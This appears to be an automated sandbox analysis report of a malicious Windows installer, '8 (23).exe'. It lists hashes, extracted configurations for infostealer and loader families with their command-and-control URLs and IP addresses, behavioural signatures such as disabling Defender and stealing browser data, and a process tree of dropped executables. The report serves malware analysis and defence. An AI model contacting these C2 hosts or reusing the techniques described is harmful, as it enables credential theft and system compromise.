Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    220s
  • max time network
    1809s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    30-07-2021 01:19

General

  • Target

    8 (23).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

C2

109.234.34.165:22204

Extracted

Family

redline

Botnet

forinstalls

C2

77.220.213.35:52349

Extracted

Family

vidar

Version

39.8

Botnet

921

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    921

Extracted

Family

vidar

Version

39.8

Botnet

932

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    932

Extracted

Family

raccoon

Botnet

b2f4d9fe1388d8fb99e44879db3e1a785afcac9d

Attributes
  • url4cnc

    https://t.me/uidsoyaada

rc4.plain
rc4.plain

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon Stealer Payload 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 7 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 55 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 15 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 13 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 13 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 23 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2840
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2696
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2680
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2440
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2432
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1952
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1376
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1332
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1184
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1088
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:1028
                        • C:\Users\Admin\AppData\Roaming\dbwvgwd
                          C:\Users\Admin\AppData\Roaming\dbwvgwd
                          2⤵
                          • Executes dropped EXE
                          PID:5476
                        • C:\Users\Admin\AppData\Local\2b458347-cc19-49df-ace4-1d0db2d8eb63\196B.exe
                          C:\Users\Admin\AppData\Local\2b458347-cc19-49df-ace4-1d0db2d8eb63\196B.exe --Task
                          2⤵
                            PID:5576
                            • C:\Users\Admin\AppData\Local\2b458347-cc19-49df-ace4-1d0db2d8eb63\196B.exe
                              C:\Users\Admin\AppData\Local\2b458347-cc19-49df-ace4-1d0db2d8eb63\196B.exe --Task
                              3⤵
                                PID:6424
                            • C:\Users\Admin\AppData\Local\2b458347-cc19-49df-ace4-1d0db2d8eb63\196B.exe
                              C:\Users\Admin\AppData\Local\2b458347-cc19-49df-ace4-1d0db2d8eb63\196B.exe --Task
                              2⤵
                                PID:6932
                                • C:\Users\Admin\AppData\Local\2b458347-cc19-49df-ace4-1d0db2d8eb63\196B.exe
                                  C:\Users\Admin\AppData\Local\2b458347-cc19-49df-ace4-1d0db2d8eb63\196B.exe --Task
                                  3⤵
                                    PID:3356
                                • C:\Users\Admin\AppData\Roaming\dbwvgwd
                                  C:\Users\Admin\AppData\Roaming\dbwvgwd
                                  2⤵
                                    PID:6576
                                  • C:\Users\Admin\AppData\Roaming\bfwvgwd
                                    C:\Users\Admin\AppData\Roaming\bfwvgwd
                                    2⤵
                                      PID:6156
                                    • C:\Users\Admin\AppData\Roaming\dewvgwd
                                      C:\Users\Admin\AppData\Roaming\dewvgwd
                                      2⤵
                                        PID:6504
                                        • C:\Users\Admin\AppData\Roaming\dewvgwd
                                          C:\Users\Admin\AppData\Roaming\dewvgwd
                                          3⤵
                                            PID:6912
                                        • C:\Users\Admin\AppData\Local\2b458347-cc19-49df-ace4-1d0db2d8eb63\196B.exe
                                          C:\Users\Admin\AppData\Local\2b458347-cc19-49df-ace4-1d0db2d8eb63\196B.exe --Task
                                          2⤵
                                            PID:6140
                                            • C:\Users\Admin\AppData\Local\2b458347-cc19-49df-ace4-1d0db2d8eb63\196B.exe
                                              C:\Users\Admin\AppData\Local\2b458347-cc19-49df-ace4-1d0db2d8eb63\196B.exe --Task
                                              3⤵
                                                PID:6696
                                            • C:\Users\Admin\AppData\Roaming\bfwvgwd
                                              C:\Users\Admin\AppData\Roaming\bfwvgwd
                                              2⤵
                                                PID:6600
                                              • C:\Users\Admin\AppData\Roaming\dbwvgwd
                                                C:\Users\Admin\AppData\Roaming\dbwvgwd
                                                2⤵
                                                  PID:6688
                                                • C:\Users\Admin\AppData\Roaming\dewvgwd
                                                  C:\Users\Admin\AppData\Roaming\dewvgwd
                                                  2⤵
                                                    PID:6608
                                                    • C:\Users\Admin\AppData\Roaming\dewvgwd
                                                      C:\Users\Admin\AppData\Roaming\dewvgwd
                                                      3⤵
                                                        PID:6164
                                                    • C:\Users\Admin\AppData\Local\2b458347-cc19-49df-ace4-1d0db2d8eb63\196B.exe
                                                      C:\Users\Admin\AppData\Local\2b458347-cc19-49df-ace4-1d0db2d8eb63\196B.exe --Task
                                                      2⤵
                                                        PID:2616
                                                        • C:\Users\Admin\AppData\Local\2b458347-cc19-49df-ace4-1d0db2d8eb63\196B.exe
                                                          C:\Users\Admin\AppData\Local\2b458347-cc19-49df-ace4-1d0db2d8eb63\196B.exe --Task
                                                          3⤵
                                                            PID:6256
                                                      • c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                        1⤵
                                                          PID:340
                                                        • C:\Users\Admin\AppData\Local\Temp\8 (23).exe
                                                          "C:\Users\Admin\AppData\Local\Temp\8 (23).exe"
                                                          1⤵
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:804
                                                          • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:1632
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\setup_install.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\setup_install.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:500
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                                4⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:2084
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\sonia_1.exe
                                                                  sonia_1.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:3856
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\sonia_1.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\sonia_1.exe" -a
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    PID:3620
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                                4⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:3604
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\sonia_2.exe
                                                                  sonia_2.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Checks SCSI registry key(s)
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious behavior: MapViewOfSection
                                                                  PID:4056
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                                4⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:2224
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\sonia_3.exe
                                                                  sonia_3.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Modifies system certificate store
                                                                  PID:4048
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4048 -s 928
                                                                    6⤵
                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                    • Program crash
                                                                    PID:4772
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                                4⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:2220
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\sonia_4.exe
                                                                  sonia_4.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1000
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c sonia_5.exe
                                                                4⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:2276
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\sonia_5.exe
                                                                  sonia_5.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:412
                                                                  • C:\Users\Admin\Documents\8kXFln6SdnDJ9gbwdfd5Mldd.exe
                                                                    "C:\Users\Admin\Documents\8kXFln6SdnDJ9gbwdfd5Mldd.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:4704
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                      7⤵
                                                                        PID:3180
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 244
                                                                        7⤵
                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                        • Program crash
                                                                        PID:3068
                                                                    • C:\Users\Admin\Documents\hNfT7UwOUWpOFT3cyS_NJPV5.exe
                                                                      "C:\Users\Admin\Documents\hNfT7UwOUWpOFT3cyS_NJPV5.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      PID:4688
                                                                      • C:\Users\Admin\Documents\hNfT7UwOUWpOFT3cyS_NJPV5.exe
                                                                        "C:\Users\Admin\Documents\hNfT7UwOUWpOFT3cyS_NJPV5.exe"
                                                                        7⤵
                                                                          PID:4832
                                                                      • C:\Users\Admin\Documents\KwYZ4CKRUkrm24fHl3LR6MRe.exe
                                                                        "C:\Users\Admin\Documents\KwYZ4CKRUkrm24fHl3LR6MRe.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:4676
                                                                        • C:\Users\Admin\Documents\KwYZ4CKRUkrm24fHl3LR6MRe.exe
                                                                          "C:\Users\Admin\Documents\KwYZ4CKRUkrm24fHl3LR6MRe.exe"
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          • Checks SCSI registry key(s)
                                                                          • Suspicious behavior: MapViewOfSection
                                                                          PID:4228
                                                                      • C:\Users\Admin\Documents\J1HleAMhmNn3jRzSYFICV6BM.exe
                                                                        "C:\Users\Admin\Documents\J1HleAMhmNn3jRzSYFICV6BM.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4848
                                                                        • C:\Users\Admin\Documents\J1HleAMhmNn3jRzSYFICV6BM.exe
                                                                          C:\Users\Admin\Documents\J1HleAMhmNn3jRzSYFICV6BM.exe
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:3376
                                                                      • C:\Users\Admin\Documents\yNdK47EmhYvOCb2rEA_7pkSb.exe
                                                                        "C:\Users\Admin\Documents\yNdK47EmhYvOCb2rEA_7pkSb.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4836
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                          7⤵
                                                                            PID:4948
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /f /im chrome.exe
                                                                              8⤵
                                                                              • Kills process with taskkill
                                                                              PID:5580
                                                                        • C:\Users\Admin\Documents\DSn0q8CezcMDk2fVnvb0fCp2.exe
                                                                          "C:\Users\Admin\Documents\DSn0q8CezcMDk2fVnvb0fCp2.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:4816
                                                                          • C:\Users\Admin\Documents\DSn0q8CezcMDk2fVnvb0fCp2.exe
                                                                            C:\Users\Admin\Documents\DSn0q8CezcMDk2fVnvb0fCp2.exe
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:4140
                                                                        • C:\Users\Admin\Documents\V85RbZNmXcsnAzI08m1_UwBY.exe
                                                                          "C:\Users\Admin\Documents\V85RbZNmXcsnAzI08m1_UwBY.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:4808
                                                                          • C:\Users\Admin\Documents\V85RbZNmXcsnAzI08m1_UwBY.exe
                                                                            C:\Users\Admin\Documents\V85RbZNmXcsnAzI08m1_UwBY.exe
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            PID:4484
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 1392
                                                                              8⤵
                                                                              • Program crash
                                                                              PID:5236
                                                                        • C:\Users\Admin\Documents\57QftOb71OEkVWCqymmg0lab.exe
                                                                          "C:\Users\Admin\Documents\57QftOb71OEkVWCqymmg0lab.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:4796
                                                                          • C:\Users\Admin\Documents\57QftOb71OEkVWCqymmg0lab.exe
                                                                            C:\Users\Admin\Documents\57QftOb71OEkVWCqymmg0lab.exe
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:3688
                                                                        • C:\Users\Admin\Documents\hDjsyppxdImzQetiBWnOcEHI.exe
                                                                          "C:\Users\Admin\Documents\hDjsyppxdImzQetiBWnOcEHI.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:4784
                                                                          • C:\Users\Admin\Documents\hDjsyppxdImzQetiBWnOcEHI.exe
                                                                            C:\Users\Admin\Documents\hDjsyppxdImzQetiBWnOcEHI.exe
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:4500
                                                                        • C:\Users\Admin\Documents\NqE7nTol3avc6iyIFwoaqgk3.exe
                                                                          "C:\Users\Admin\Documents\NqE7nTol3avc6iyIFwoaqgk3.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4856
                                                                          • C:\Users\Admin\Documents\NqE7nTol3avc6iyIFwoaqgk3.exe
                                                                            "C:\Users\Admin\Documents\NqE7nTol3avc6iyIFwoaqgk3.exe"
                                                                            7⤵
                                                                              PID:5204
                                                                              • C:\Windows\System32\Conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                8⤵
                                                                                  PID:5596
                                                                            • C:\Users\Admin\Documents\ryAvYCsWwQ2rj9M8VHPCS7IW.exe
                                                                              "C:\Users\Admin\Documents\ryAvYCsWwQ2rj9M8VHPCS7IW.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4776
                                                                            • C:\Users\Admin\Documents\H2FPUwSf6aILHhe6H9UU2FRh.exe
                                                                              "C:\Users\Admin\Documents\H2FPUwSf6aILHhe6H9UU2FRh.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:4824
                                                                              • C:\Users\Admin\Documents\H2FPUwSf6aILHhe6H9UU2FRh.exe
                                                                                "C:\Users\Admin\Documents\H2FPUwSf6aILHhe6H9UU2FRh.exe"
                                                                                7⤵
                                                                                  PID:5608
                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                    8⤵
                                                                                      PID:5380
                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                        9⤵
                                                                                          PID:5272
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                        8⤵
                                                                                          PID:5884
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffa8c8d4f50,0x7ffa8c8d4f60,0x7ffa8c8d4f70
                                                                                            9⤵
                                                                                              PID:4288
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1532,12164867954002018408,5461179612510239134,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1544 /prefetch:2
                                                                                              9⤵
                                                                                                PID:6128
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1532,12164867954002018408,5461179612510239134,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2120 /prefetch:8
                                                                                                9⤵
                                                                                                  PID:1040
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,12164867954002018408,5461179612510239134,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2108 /prefetch:8
                                                                                                  9⤵
                                                                                                    PID:5916
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,12164867954002018408,5461179612510239134,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2348 /prefetch:1
                                                                                                    9⤵
                                                                                                      PID:60
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,12164867954002018408,5461179612510239134,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2584 /prefetch:1
                                                                                                      9⤵
                                                                                                        PID:3632
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,12164867954002018408,5461179612510239134,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=792 /prefetch:1
                                                                                                        9⤵
                                                                                                          PID:6556
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,12164867954002018408,5461179612510239134,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1
                                                                                                          9⤵
                                                                                                            PID:6636
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,12164867954002018408,5461179612510239134,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:1
                                                                                                            9⤵
                                                                                                              PID:6756
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,12164867954002018408,5461179612510239134,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1
                                                                                                              9⤵
                                                                                                                PID:6784
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,12164867954002018408,5461179612510239134,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
                                                                                                                9⤵
                                                                                                                  PID:7152
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1532,12164867954002018408,5461179612510239134,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5364 /prefetch:2
                                                                                                                  9⤵
                                                                                                                    PID:6172
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,12164867954002018408,5461179612510239134,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4680 /prefetch:8
                                                                                                                    9⤵
                                                                                                                      PID:1132
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,12164867954002018408,5461179612510239134,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3832 /prefetch:8
                                                                                                                      9⤵
                                                                                                                        PID:6260
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,12164867954002018408,5461179612510239134,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5292 /prefetch:8
                                                                                                                        9⤵
                                                                                                                          PID:4768
